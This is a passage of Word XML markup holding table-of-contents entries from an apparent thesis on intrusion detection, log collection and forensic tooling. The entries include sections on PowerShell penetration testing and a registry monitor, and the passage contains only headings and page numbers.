              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303733" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3</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NotifyServiceStatusChange and Asynchronous Procedure Calls</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303733 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303734" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</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Distributed Log Collector Hardware (2/6)</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303734 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303735" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</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Log Collector Hardware architecture</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303735 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303736" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2</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Distributed Log Collector Hardware workflows</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303736 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303737" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3</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DLCH Server</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303737 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303738" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</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Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303738 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303739" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1</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CLSS Architecture</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303739 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303740" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2</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CLSS Workflows</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303740 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303741" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</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Sentry: Forensic Toolkit</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303741 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303742" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.1</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Powershell for penetration testing</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303742 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303743" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.2</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Sentry’s Modules</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303743 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303744" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 4.</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IMPLEMENTATION</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303744 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303745" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</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APTIDS</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303745 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303746" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1</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Registry Monitor module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303746 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
